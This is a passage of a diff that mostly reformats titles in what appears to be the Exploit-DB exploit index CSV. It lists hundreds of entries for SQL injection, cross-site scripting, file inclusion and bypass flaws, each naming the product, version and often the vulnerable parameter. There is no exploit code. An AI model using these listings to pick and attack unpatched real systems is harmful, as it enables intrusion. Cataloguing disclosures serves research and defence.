P-660HN-T1A Router - Login Bypass",2014-03-12,"Michael Grifalconi",hardware,webapps,0 32282,platforms/php/webapps/32282.txt,"Church Edit - Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0 32207,platforms/php/webapps/32207.txt,"GNUPanel 0.3.5_R4 - Multiple Vulnerabilities",2014-03-12,"Necmettin COSKUN",php,webapps,80 32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - Cross-Site Request Forgery / Blind SQL Injection",2014-03-12,"TUNISIAN CYBER",php,webapps,80 -32212,platforms/asp/webapps/32212.txt,"Procentia IntelliPen 1.1.12.1520 - data.aspx Blind SQL Injection",2014-03-12,Portcullis,asp,webapps,80 +32212,platforms/asp/webapps/32212.txt,"Procentia IntelliPen 1.1.12.1520 - 'data.aspx' Blind SQL Injection",2014-03-12,Portcullis,asp,webapps,80 32213,platforms/php/webapps/32213.txt,"vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion",2014-03-12,Portcullis,php,webapps,80 32217,platforms/php/webapps/32217.txt,"Linkspider 1.08 - Multiple Remote File Inclusions",2008-08-08,"Rohit Bansal",php,webapps,0 32218,platforms/php/webapps/32218.txt,"Domain Group Network GooCMS 1.02 - 'index.php' Cross-Site Scripting",2008-08-11,ahmadbaby,php,webapps,0 32219,platforms/php/webapps/32219.txt,"Kayako SupportSuite 3.x - '/visitor/index.php?sessionid' Cross-Site Scripting",2008-08-11,"James Bercegay",php,webapps,0 -32220,platforms/php/webapps/32220.txt,"Kayako SupportSuite 3.x - 'index.php' filter Parameter Cross-Site Scripting",2008-08-11,"James Bercegay",php,webapps,0 +32220,platforms/php/webapps/32220.txt,"Kayako SupportSuite 3.x - 'index.php?filter' Cross-Site Scripting",2008-08-11,"James Bercegay",php,webapps,0 32221,platforms/php/webapps/32221.txt,"Kayako SupportSuite 3.x - '/staff/index.php?customfieldlinkid' SQL Injection",2008-08-11,"James Bercegay",php,webapps,0 32226,platforms/php/webapps/32226.txt,"Datafeed Studio - 'patch.php' Remote File Inclusion",2008-08-12,"Bug Researchers Group",php,webapps,0 32227,platforms/php/webapps/32227.txt,"Datafeed Studio 1.6.2 - 'search.php' Cross-Site Scripting",2008-08-12,"Bug Researchers Group",php,webapps,0 @@ -33038,7 +33039,7 @@ id,file,description,date,author,platform,type,port 32250,platforms/php/webapps/32250.py,"mUnky 0.01 - 'index.php' Remote Code Execution",2008-08-15,"Khashayar Fereidani",php,webapps,0 32251,platforms/php/webapps/32251.txt,"PHPizabi 0.848b C1 HP3 - 'id' Local File Inclusion",2008-08-15,Lostmon,php,webapps,0 32252,platforms/php/webapps/32252.txt,"Mambo Open Source 4.6.2 - '/administrator/popups/index3pop.php?mosConfig_sitename' Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps,0 -32253,platforms/php/webapps/32253.txt,"Mambo Open Source 4.6.2 - '/mambots/editors/mostlyce/' PHP/connector.php Query String Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps,0 +32253,platforms/php/webapps/32253.txt,"Mambo Open Source 4.6.2 - '/mambots/editors/mostlyce/' PHP/connector.php?Query String Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps,0 32254,platforms/php/webapps/32254.txt,"FlexCMS 2.5 - 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting",2008-08-15,Dr.Crash,php,webapps,0 32255,platforms/asp/webapps/32255.txt,"FipsCMS 2.1 - 'neu.asp' SQL Injection",2008-08-15,U238,asp,webapps,0 32257,platforms/php/webapps/32257.txt,"PromoProducts - 'view_product.php' Multiple SQL Injections",2008-08-15,baltazar,php,webapps,0 @@ -33047,9 +33048,9 @@ id,file,description,date,author,platform,type,port 33409,platforms/php/webapps/33409.txt,"Article Directory - 'login.php' SQL Injection",2009-12-16,"R3d D3v!L",php,webapps,0 32285,platforms/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 - '$newpm[title]' Cross-Site Scripting",2008-08-20,"Core Security",php,webapps,0 32263,platforms/php/webapps/32263.txt,"Fonality trixbox - 'mac' Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80 -32264,platforms/php/webapps/32264.txt,"Freeway 1.4.1.171 - '/french/account_newsletters.php' language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32264,platforms/php/webapps/32264.txt,"Freeway 1.4.1.171 - '/french/account_newsletters.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32265,platforms/php/webapps/32265.txt,"Freeway 1.4.1.171 - '/includes/modules/faqdesk/faqdesk_article_require.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 -32266,platforms/php/webapps/32266.txt,"Freeway 1.4.1.171 - '/includes/modules/newsdesk/newsdesk_article_require.php' language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32266,platforms/php/webapps/32266.txt,"Freeway 1.4.1.171 - '/includes/modules/newsdesk/newsdesk_article_require.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32267,platforms/php/webapps/32267.txt,"Freeway 1.4.1.171 - '/templates/Freeway/boxes/card1.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32268,platforms/php/webapps/32268.txt,"Freeway 1.4.1.171 - '/templates/Freeway/boxes/loginbox.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32269,platforms/php/webapps/32269.txt,"Freeway 1.4.1.171 - '/templates/Freeway/boxes/whos_online.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 @@ -33085,7 +33086,7 @@ id,file,description,date,author,platform,type,port 32315,platforms/php/webapps/32315.txt,"OpenDB 1.0.6 - 'user_profile.php?redirect_url' Cross-Site Scripting",2008-08-28,C1c4Tr1Z,php,webapps,0 32316,platforms/php/webapps/32316.txt,"eliteCMS 1.0 - 'page' SQL Injection",2008-09-03,e.wiZz!,php,webapps,0 32317,platforms/php/webapps/32317.txt,"@Mail 5.42 and @Mail WebMail 5.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-03,C1c4Tr1Z,php,webapps,0 -32318,platforms/php/webapps/32318.txt,"XRms 1.99.2 - 'login.php' target Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32318,platforms/php/webapps/32318.txt,"XRms 1.99.2 - 'login.php?target' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 32319,platforms/php/webapps/32319.txt,"OpenSupports 2.x - Authentication Bypass / Cross-Site Request Forgery",2014-03-17,"TN CYB3R",php,webapps,0 32320,platforms/php/webapps/32320.txt,"XRms 1.99.2 - 'title' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 32321,platforms/php/webapps/32321.txt,"XRms 1.99.2 - 'company_name' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 @@ -33146,7 +33147,7 @@ id,file,description,date,author,platform,type,port 32461,platforms/php/webapps/32461.txt,"AmpJuke 0.7.5 - 'index.php' SQL Injection",2008-10-03,S_DLA_S,php,webapps,0 32462,platforms/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - 'POST' Filter Security Bypass",2008-10-06,WHK,php,webapps,0 32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b - 'main.php?refer' Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 -32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b - 'edit.php' File Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 +32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b - 'edit.php?File' Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 32467,platforms/php/webapps/32467.txt,"Opera Web Browser 8.51 - URI redirection Remote Code Execution",2008-10-08,MATASANOS,php,webapps,0 32468,platforms/php/webapps/32468.txt,"DFFFrameworkAPI - 'DFF_config[dir_include]' Multiple Remote File Inclusions",2008-10-08,GoLd_M,php,webapps,0 32473,platforms/php/webapps/32473.txt,"Joomla! Component com_jeux - 'id' SQL Injection",2008-10-11,H!tm@N,php,webapps,0 @@ -33175,7 +33176,7 @@ id,file,description,date,author,platform,type,port 32507,platforms/php/webapps/32507.txt,"Kemana Directory 1.5.6 - Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0 32508,platforms/php/webapps/32508.txt,"Kemana Directory 1.5.6 - 'task.php' Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0 32509,platforms/php/webapps/32509.txt,"Kemana Directory 1.5.6 - Database Backup Disclosure",2014-03-25,LiquidWorm,php,webapps,0 -32510,platforms/php/webapps/32510.txt,"Kemana Directory 1.5.6 - (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit",2014-03-25,LiquidWorm,php,webapps,0 +32510,platforms/php/webapps/32510.txt,"Kemana Directory 1.5.6 - 'qvc_init()' Cookie Poisoning CAPTCHA Bypass Exploit",2014-03-25,LiquidWorm,php,webapps,0 32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80 32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - 'xhr.php?i' SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 32521,platforms/php/webapps/32521.txt,"Osprey 1.0a4.1 - 'ListRecords.php' Multiple Remote File Inclusions",2008-10-23,BoZKuRTSeRDaR,php,webapps,0 @@ -33225,7 +33226,7 @@ id,file,description,date,author,platform,type,port 32588,platforms/php/webapps/32588.txt,"BoutikOne CMS - 'search_query' Cross-Site Scripting",2008-11-17,d3v1l,php,webapps,0 32589,platforms/php/webapps/32589.html,"Kimson CMS - 'id' Cross-Site Scripting",2008-11-18,md.r00t,php,webapps,0 32592,platforms/php/webapps/32592.txt,"Easyedit CMS - 'subcategory.php?intSubCategoryID' SQL Injection",2008-11-19,d3v1l,php,webapps,0 -32593,platforms/php/webapps/32593.txt,"Easyedit CMS - 'page.php' intPageID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0 +32593,platforms/php/webapps/32593.txt,"Easyedit CMS - 'page.php?intPageID' SQL Injection",2008-11-19,d3v1l,php,webapps,0 32594,platforms/php/webapps/32594.txt,"Easyedit CMS - 'news.php?intPageID' SQL Injection",2008-11-19,d3v1l,php,webapps,0 32595,platforms/php/webapps/32595.txt,"Softbiz Classifieds Script - Cross-Site Scripting",2008-11-20,"Vahid Ezraeil",php,webapps,0 32597,platforms/php/webapps/32597.txt,"Pilot Group PG Roommate Finder Solution - SQL Injection",2008-11-23,ZoRLu,php,webapps,0 @@ -33257,7 +33258,7 @@ id,file,description,date,author,platform,type,port 32626,platforms/asp/webapps/32626.txt,"ASP Forum Script - 'messages.asp?message_id' SQL Injection",2008-12-01,Pouya_Server,asp,webapps,0 32627,platforms/php/webapps/32627.txt,"ASP Forum Script - 'new_message.asp?forum_id' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 32628,platforms/asp/webapps/32628.txt,"ASP Forum Script - 'messages.asp?forum_id' Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 -32629,platforms/asp/webapps/32629.txt,"ASP Forum Script - default.asp Query String Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 +32629,platforms/asp/webapps/32629.txt,"ASP Forum Script - 'default.asp' Query String Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 32630,platforms/asp/webapps/32630.txt,"Pre ASP Job Board - 'emp_login.asp' Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 32631,platforms/multiple/webapps/32631.txt,"IBM Rational ClearCase 7/8 - Cross-Site Scripting",2008-12-01,IBM,multiple,webapps,0 32632,platforms/php/webapps/32632.php,"Fantastico - 'index.php' Local File Inclusion",2008-12-02,Super-Crystal,php,webapps,0 @@ -33267,7 +33268,7 @@ id,file,description,date,author,platform,type,port 32636,platforms/php/webapps/32636.txt,"Orkut Clone - 'profile_social.php?id' SQL Injection",2008-12-02,d3b4g,php,webapps,0 32637,platforms/php/webapps/32637.txt,"Orkut Clone - 'profile_social.php?id' Cross-Site Scripting",2008-12-02,d3b4g,php,webapps,0 32638,platforms/php/webapps/32638.txt,"Horde Webmail 5.1 - Open Redirect",2014-04-01,"felipe andrian",php,webapps,0 -32639,platforms/php/webapps/32639.txt,"Yappa-ng - 'index.php' album Parameter Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0 +32639,platforms/php/webapps/32639.txt,"Yappa-ng - 'index.php?album' Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0 32640,platforms/php/webapps/32640.txt,"Yappa-ng - Query String Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0 32641,platforms/php/webapps/32641.txt,"RevSense 1.0 - SQL Injection / Cross-Site Scripting",2008-12-04,Pouya_Server,php,webapps,0 32642,platforms/php/webapps/32642.txt,"PHPSTREET WebBoard 1.0 - 'show.php' SQL Injection",2008-12-04,"CWH Underground",php,webapps,0 @@ -33277,9 +33278,9 @@ id,file,description,date,author,platform,type,port 32647,platforms/php/webapps/32647.txt,"PrestaShop 1.1 - '/admin/login.php?PATH_INFO' Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 32648,platforms/php/webapps/32648.txt,"PrestaShop 1.1 - 'order.php?PATH_INFO' Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 32649,platforms/php/webapps/32649.txt,"PHPepperShop 1.4 - 'index.php' URL Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 -32650,platforms/php/webapps/32650.txt,"PHPepperShop 1.4 - shop/kontakt.php URL Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 -32651,platforms/php/webapps/32651.txt,"PHPepperShop 1.4 - shop/Admin/shop_kunden_mgmt.php URL Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 -32652,platforms/php/webapps/32652.txt,"PHPepperShop 1.4 - shop/Admin/SHOP_KONFIGURATION.php URL Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 +32650,platforms/php/webapps/32650.txt,"PHPepperShop 1.4 - 'shop/kontakt.php' URL Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 +32651,platforms/php/webapps/32651.txt,"PHPepperShop 1.4 - 'shop/Admin/shop_kunden_mgmt.php' URL Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 +32652,platforms/php/webapps/32652.txt,"PHPepperShop 1.4 - 'shop/Admin/SHOP_KONFIGURATION.php' URL Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 32653,platforms/asp/webapps/32653.txt,"Professional Download Assistant 0.1 - SQL Injection",2008-12-09,ZoRLu,asp,webapps,0 32655,platforms/jsp/webapps/32655.txt,"Multiple Ad Server Solutions Products - 'logon_processing.jsp' SQL Injection",2008-12-11,"3d D3v!L",jsp,webapps,0 32656,platforms/php/webapps/32656.txt,"Octeth Oempro 3.5.5 - Multiple SQL Injections",2008-12-01,"security curmudgeon",php,webapps,0 @@ -33309,8 +33310,8 @@ id,file,description,date,author,platform,type,port 32701,platforms/php/webapps/32701.txt,"WordPress Plugin XCloner 3.1.0 - Cross-Site Request Forgery",2014-04-04,"High-Tech Bridge SA",php,webapps,80 32703,platforms/ios/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent Exploit",2014-04-05,Vulnerability-Lab,ios,webapps,0 32708,platforms/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 - '/pagesUTF8/auftrag_allgemeinauftrag.jsp' Multiple Cross-Site Scripting Vulnerabilities",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 -32709,platforms/jsp/webapps/32709.txt,"Plunet BusinessManager 4.1 - pagesUTF8/Sys_DirAnzeige.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 -32710,platforms/jsp/webapps/32710.txt,"Plunet BusinessManager 4.1 - pagesUTF8/auftrag_job.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 +32709,platforms/jsp/webapps/32709.txt,"Plunet BusinessManager 4.1 - 'pagesUTF8/Sys_DirAnzeige.jsp?Pfad' Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 +32710,platforms/jsp/webapps/32710.txt,"Plunet BusinessManager 4.1 - 'pagesUTF8/auftrag_job.jsp?Pfad' Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 32713,platforms/php/webapps/32713.txt,"tadbook2 Module for XOOPS - 'open_book.php' SQL Injection",2009-01-07,stylextra,php,webapps,0 32714,platforms/php/webapps/32714.txt,"Visuplay CMS - Multiple SQL Injections",2009-01-12,"Joseph Giron",php,webapps,0 32716,platforms/asp/webapps/32716.html,"Comersus Cart 6 - User Email and User Password Unauthorized Access",2009-01-12,ajann,asp,webapps,0 @@ -33327,8 +33328,8 @@ id,file,description,date,author,platform,type,port 32734,platforms/cgi/webapps/32734.txt,"LemonLDAP:NG 0.9.3.1 - User Enumeration Weakness / Cross-Site Scripting",2009-01-16,"clément Oudot",cgi,webapps,0 32735,platforms/asp/webapps/32735.txt,"Blog Manager - 'ItemID' SQL Injection",2009-01-16,Pouya_Server,asp,webapps,0 32736,platforms/asp/webapps/32736.txt,"Blog Manager - 'categoryId' Cross-Site Scripting",2009-01-16,Pouya_Server,asp,webapps,0 -32741,platforms/jsp/webapps/32741.txt,"Apache JackRabbit 1.4/1.5 Content Repository (JCR) - search.jsp q Parameter Cross-Site Scripting",2009-01-20,"Red Hat",jsp,webapps,0 -32742,platforms/jsp/webapps/32742.txt,"Apache JackRabbit 1.4/1.5 Content Repository (JCR) - swr.jsp q Parameter Cross-Site Scripting",2009-01-20,"Red Hat",jsp,webapps,0 +32741,platforms/jsp/webapps/32741.txt,"Apache JackRabbit 1.4/1.5 Content Repository (JCR) - 'search.jsp?q' Cross-Site Scripting",2009-01-20,"Red Hat",jsp,webapps,0 +32742,platforms/jsp/webapps/32742.txt,"Apache JackRabbit 1.4/1.5 Content Repository (JCR) - 'swr.jsp?q' Cross-Site Scripting",2009-01-20,"Red Hat",jsp,webapps,0 32746,platforms/cgi/webapps/32746.txt,"MoinMoin 1.8 - 'AttachFile.py' Cross-Site Scripting",2009-01-20,SecureState,cgi,webapps,0 32747,platforms/php/webapps/32747.txt,"PHP-Nuke Downloads Module - 'url' SQL Injection",2009-01-23,"Sina Yazdanmehr",php,webapps,0 32748,platforms/asp/webapps/32748.txt,"BBSXP 5.13 - 'error.asp' Cross-Site Scripting",2009-01-23,arashps0,asp,webapps,0 @@ -33346,8 +33347,8 @@ id,file,description,date,author,platform,type,port 32773,platforms/php/webapps/32773.txt,"Simple Machines Forum (SMF) 1.1.7 - '[url]' Tag HTML Injection",2009-02-03,Xianur0,php,webapps,0 32777,platforms/php/webapps/32777.html,"MetaBBS 0.11 - Administration Settings Authentication Bypass",2009-02-04,make0day,php,webapps,0 32779,platforms/php/webapps/32779.txt,"Ilch CMS 1.1 - 'HTTP_X_FORWARDED_FOR' SQL Injection",2009-02-06,Gizmore,php,webapps,0 -32782,platforms/php/webapps/32782.txt,"FotoWeb 6.0 - Login.fwx s Parameter Cross-Site Scripting",2009-02-09,"Stelios Tigkas",php,webapps,0 -32783,platforms/php/webapps/32783.txt,"FotoWeb 6.0 - Grid.fwx search Parameter Cross-Site Scripting",2009-02-09,"Stelios Tigkas",php,webapps,0 +32782,platforms/php/webapps/32782.txt,"FotoWeb 6.0 - 'Login.fwx?s' Cross-Site Scripting",2009-02-09,"Stelios Tigkas",php,webapps,0 +32783,platforms/php/webapps/32783.txt,"FotoWeb 6.0 - 'Grid.fwx?search' Cross-Site Scripting",2009-02-09,"Stelios Tigkas",php,webapps,0 32784,platforms/php/webapps/32784.txt,"glFusion 1.1 - Anonymous Comment 'Username' HTML Injection",2009-02-05,"Bjarne Mathiesen Schacht",php,webapps,0 32785,platforms/php/webapps/32785.txt,"Bitrix Site Manager 6/7 - Multiple Input Validation Vulnerabilities",2009-02-09,aGGreSSor,php,webapps,0 33129,platforms/hardware/webapps/33129.html,"Beetel 450TC2 Router - Cross-Site Request Forgery (Admin Password)",2014-04-30,"shyamkumar somana",hardware,webapps,80 @@ -33362,7 +33363,7 @@ id,file,description,date,author,platform,type,port 32807,platforms/php/webapps/32807.txt,"Joomla! / Mambo Component gigCalendar 1.0 - 'banddetails.php' SQL Injection",2009-02-23,"Salvatore Fresta",php,webapps,0 32808,platforms/php/webapps/32808.txt,"Magento 1.2 - '/app/code/core/Mage/Admin/Model/Session.php?login['Username']' Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32809,platforms/php/webapps/32809.txt,"Magento 1.2 - '/app/code/core/Mage/Adminhtml/controllers/IndexController.php?email' Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 -32810,platforms/php/webapps/32810.txt,"Magento 1.2 - downloader/index.php URL Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 +32810,platforms/php/webapps/32810.txt,"Magento 1.2 - 'downloader/index.php' URL Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32814,platforms/php/webapps/32814.txt,"Sendy 1.1.9.1 - SQL Injection",2014-04-11,delme,php,webapps,0 32816,platforms/php/webapps/32816.txt,"Orooj CMS - 'news.php' SQL Injection",2009-02-25,Cru3l.b0y,php,webapps,0 32818,platforms/java/webapps/32818.txt,"JOnAS 4.10.3 - 'select' Error Page Cross-Site Scripting",2009-02-25,"Digital Security Research Group",java,webapps,0 @@ -33408,7 +33409,7 @@ id,file,description,date,author,platform,type,port 32888,platforms/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 - SQL Injection / Cross-Site Scripting",2009-04-02,"Patrick Webster",asp,webapps,0 32889,platforms/php/webapps/32889.txt,"4CMS - SQL Injection / Local File Inclusion",2009-04-02,k1ll3r_null,php,webapps,0 32894,platforms/multiple/webapps/32894.txt,"IBM Bladecenter Advanced Management Module 1.42 - Login 'Username' Cross-Site Scripting",2009-04-09,"Henri Lindberg",multiple,webapps,0 -32895,platforms/multiple/webapps/32895.txt,"IBM Bladecenter Advanced Management Module 1.42 - private/file_Management.ssi PATH Parameter Cross-Site Scripting",2009-04-09,"Henri Lindberg",multiple,webapps,0 +32895,platforms/multiple/webapps/32895.txt,"IBM Bladecenter Advanced Management Module 1.42 - '/private/file_Management.ssi?PATH' Cross-Site Scripting",2009-04-09,"Henri Lindberg",multiple,webapps,0 32896,platforms/multiple/webapps/32896.html,"IBM Bladecenter Advanced Management Module 1.42 - Cross-Site Request Forgery",2009-04-09,"Henri Lindberg",multiple,webapps,0 32897,platforms/java/webapps/32897.txt,"Cisco Subscriber Edge Services Manager - Cross-Site Scripting / HTML Injection",2009-04-09,"Usman Saeed",java,webapps,0 32898,platforms/asp/webapps/32898.txt,"Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection",2009-04-09,"ThE g0bL!N",asp,webapps,0 @@ -33426,7 +33427,7 @@ id,file,description,date,author,platform,type,port 32928,platforms/php/webapps/32928.txt,"Malleo 1.2.3 - 'admin.php' Local File Inclusion",2009-04-17,Drosophila,php,webapps,0 32930,platforms/php/webapps/32930.txt,"CMSimple 4.4/4.4.2 - Remote File Inclusion",2014-04-18,NoGe,php,webapps,80 32932,platforms/php/webapps/32932.txt,"Online Photo Pro 2.0 - 'section' Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps,0 -32933,platforms/php/webapps/32933.txt,"Online Contact Manager 3.0 - 'index.php' showGroup Parameter Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps,0 +32933,platforms/php/webapps/32933.txt,"Online Contact Manager 3.0 - 'index.php?showGroup' Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps,0 32934,platforms/php/webapps/32934.txt,"Online Contact Manager 3.0 - 'view.php?id' Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps,0 32935,platforms/php/webapps/32935.txt,"Online Contact Manager 3.0 - 'email.php?id' Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps,0 32936,platforms/php/webapps/32936.txt,"Online Contact Manager 3.0 - 'edit.php?id' Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps,0 @@ -33504,7 +33505,7 @@ id,file,description,date,author,platform,type,port 33112,platforms/php/webapps/33112.txt,"PG Roommate Finder Solution - 'quick_search.php?part' Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0 33113,platforms/php/webapps/33113.txt,"PG Roommate Finder Solution - 'viewprofile.php?part' Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0 33114,platforms/php/webapps/33114.txt,"Joomla! Component Almond Classifieds 7.5 - Cross-Site Scripting / SQL Injection",2009-06-27,Moudi,php,webapps,0 -33115,platforms/php/webapps/33115.txt,"AlmondSoft Multiple Classifieds Products - 'index.php' replid Parameter SQL Injection",2009-06-27,Moudi,php,webapps,0 +33115,platforms/php/webapps/33115.txt,"AlmondSoft Multiple Classifieds Products - 'index.php?replid' SQL Injection",2009-06-27,Moudi,php,webapps,0 33116,platforms/php/webapps/33116.txt,"AlmondSoft Multiple Classifieds Products - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-06-27,Moudi,php,webapps,0 33117,platforms/php/webapps/33117.txt,"AlmondSoft Classifieds Pro - 'gmap.php?addr' Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0 33119,platforms/php/webapps/33119.txt,"Pilot Group eTraining - 'courses_login.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 @@ -33539,10 +33540,10 @@ id,file,description,date,author,platform,type,port 33159,platforms/hardware/webapps/33159.txt,"Seagate BlackArmor NAS - Multiple Vulnerabilities",2014-05-03,"Shayan S",hardware,webapps,0 33160,platforms/php/webapps/33160.txt,"Papoo 3.x - Upload Images Arbitrary File Upload",2009-08-10,"RedTeam Pentesting GmbH",php,webapps,0 33166,platforms/php/webapps/33166.txt,"Discuz! 6.0 - '2fly_gift.php' SQL Injection",2009-08-15,Securitylab.ir,php,webapps,0 -33167,platforms/cfm/webapps/33167.txt,"Adobe ColdFusion Server 8.0.1 - wizards/common/_authenticatewizarduser.cfm Query String Cross-Site Scripting",2009-08-17,"Alexander Polyakov",cfm,webapps,0 -33168,platforms/cfm/webapps/33168.txt,"Adobe ColdFusion Server 8.0.1 - administrator/logviewer/searchlog.cfm startRow Parameter Cross-Site Scripting",2009-08-17,"Alexander Polyakov",cfm,webapps,0 -33169,platforms/cfm/webapps/33169.txt,"Adobe ColdFusion Server 8.0.1 - wizards/common/_logintowizard.cfm Query String Cross-Site Scripting",2009-08-17,"Alexander Polyakov",cfm,webapps,0 -33170,platforms/cfm/webapps/33170.txt,"Adobe ColdFusion Server 8.0.1 - administrator/enter.cfm Query String Cross-Site Scripting",2009-08-17,"Alexander Polyakov",cfm,webapps,0 +33167,platforms/cfm/webapps/33167.txt,"Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting",2009-08-17,"Alexander Polyakov",cfm,webapps,0 +33168,platforms/cfm/webapps/33168.txt,"Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting",2009-08-17,"Alexander Polyakov",cfm,webapps,0 +33169,platforms/cfm/webapps/33169.txt,"Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting",2009-08-17,"Alexander Polyakov",cfm,webapps,0 +33170,platforms/cfm/webapps/33170.txt,"Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting",2009-08-17,"Alexander Polyakov",cfm,webapps,0 33171,platforms/asp/webapps/33171.txt,"DUWare DUgallery 3.0 - '/admin/edit.asp' Authentication Bypass",2009-08-17,spymeta,asp,webapps,0 33178,platforms/php/webapps/33178.txt,"Computer Associates SiteMinder - '%00' Cross-Site Scripting Protection Security Bypass",2009-06-08,"Arshan Dabirsiaghi",php,webapps,0 33254,platforms/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 - 'simpleSearch.do' Cross-Site Scripting",2009-09-23,IBM,java,webapps,0 @@ -33554,7 +33555,7 @@ id,file,description,date,author,platform,type,port 33188,platforms/php/webapps/33188.txt,"VideoGirls - 'view.php?p' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 33189,platforms/php/webapps/33189.txt,"PHP-Fusion 6.1.18 - Multiple Information Disclosure Vulnerabilities",2009-08-26,Inj3ct0r,php,webapps,0 33190,platforms/php/webapps/33190.txt,"OpenAutoClassifieds 1.5.9 - SQL Injection",2009-08-25,"Andrew Horton",php,webapps,0 -33191,platforms/php/webapps/33191.txt,"FlexCMS 2.5 - 'CookieUsername' Cookie Parameter SQL Injection",2009-08-28,Inj3ct0r,php,webapps,0 +33191,platforms/php/webapps/33191.txt,"FlexCMS 2.5 - 'CookieUsername' Cookie SQL Injection",2009-08-28,Inj3ct0r,php,webapps,0 33195,platforms/php/webapps/33195.txt,"TeamHelpdesk Customer Web Service (CWS) 8.3.5 & Technician Web Access (TWA) 8.3.5 - Remote User Credential Dump",2014-05-05,bhamb,php,webapps,0 33199,platforms/php/webapps/33199.txt,"68 Classifieds 4.1 - 'searchresults.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 33200,platforms/php/webapps/33200.txt,"68 Classifieds 